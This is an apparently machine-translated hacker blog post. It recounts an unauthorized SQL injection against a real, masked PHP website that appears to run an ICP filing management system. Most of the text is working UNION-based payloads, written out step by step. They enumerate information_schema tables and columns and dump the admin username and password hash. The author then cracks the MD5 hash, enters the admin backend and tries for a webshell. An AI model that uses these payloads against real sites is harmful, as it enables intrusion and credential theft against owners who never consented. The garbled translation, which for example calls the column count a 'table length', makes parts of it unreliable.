PHP injection detects an ICP filing management system

Author: viekst

Today, when I visited my friend's website, I jumped to an ICP filing management system website. I was bored, so I checked my website,

 

Open a webpage http: // *****. *****. com/hunet.com/show_news.php? Id = 15
It is customary to add a single quotation mark ,.. Error

 

Then add and 1 = 1 and 1 = 2 to return normal and return blank. It seems that injection exists and put it into the ah d detection. The table segment cannot be found ..
It seems that there is only manual injection ..
Then we use order by to guess the table length.
Http: // ***. ***. com/show_news.php? Id = 7 order by 6 Returns normal
Http: // ***. ***. com/show_news.php? Id = 7 order by 7 Error returned
It seems that the table name length is 7
Http: // ***. ***. com/show_news.php? Id = 7 and 1 = 2 union select 1, 2, 3, 4, 5, 6 -- returns 3, 4, 5
Http: // ***. ***. com/show_news.php? Id = 7 and 1 = 2 union select 1, 2, user (), 4, 5, 6 -- Return user fig @ localhost
Replace user () with database () version () to get the database Name and mySQL version Huong 5.0.51a-community-nt

Mysql4.0 began to support joint query. More than 5.0 added an information_schema virtual database, so we can query this virtual database to find the Administrator table segment and field,
Then, the Administrator account and password are identified through the combined query ,,
We know that the current database name is Huong, so we need to check the database name again, but we need to convert it to hexadecimal .. Next

Http: // ***. ***. com/show_news.php? Id = 7 and 1 = 2 union select 1, 2, table_name, 4, 5, 6 from information_schema.tables where table_schema = 0x6875746F6E67 -- Return ba_admin_action
This is not an administrator table segment. We can add limit next to it to control the returned results.

Http: // ***. ***. com/show_news.php? Id = 7 and 1 = 2 union select 1, 2, table_name, 4, 5, 6 from information_schema.tables where table_schema = 0x6875746F6E67 limit 3, 1 -- Return ba_admin_user, which is the name of the Administrator table segment ..

Query the fields in the ba_admin_user table. Here, the ba_admin_user must be converted to the hexadecimal 0x62615F61646D696E5F75736572.

Http: // ***. ***. com/show_news.php? Id = 7 and 1 = 2 union select 1, 2, column_name, 4, 5, 6 from information_schema.columns where table_name = 0x62615F61646D696E5F75736572 limit 0, 1 -- Return user_id

Http: // ***. ***. com/show_news.php? Id = 7 and 1 = 2 union select 1, 2, column_name, 4, 5, 6 from information_schema.columns where table_name = 0x62615F61646D696E5F75736572 limit 1, 1 -- Return user_name

Http: // ***. ***. com/show_news.php? Id = 7 and 1 = 2 union select 1, 2, column_name, 4, 5, 6 from information_schema.columns where table_name = 0x62615F61646D696E5F75736572 limit 3, 1 -- Return password

OK. Now we can find the management table segment and field to perform the joint query. Note the management account and password,
Http: // ***. ***. com/show_news.php? Id = 7 and 1 = 2 union select 1, 2, user_name, password, 5, 6 from ba_admin_user --

 

The background management page shows that the MD5 password is successfully cracked by default and enters the background ..

 

I tried to get webshell, but the platform mainly modified and reviewed the record filing information of some domain names, and there was no other usable information,

 

Although the ewebditor editor was used for publishing news, it was deleted from the background and multiple pages were deleted. As a result, no other image files could be uploaded, so I had to give up! However, you can do a lot in the background, right?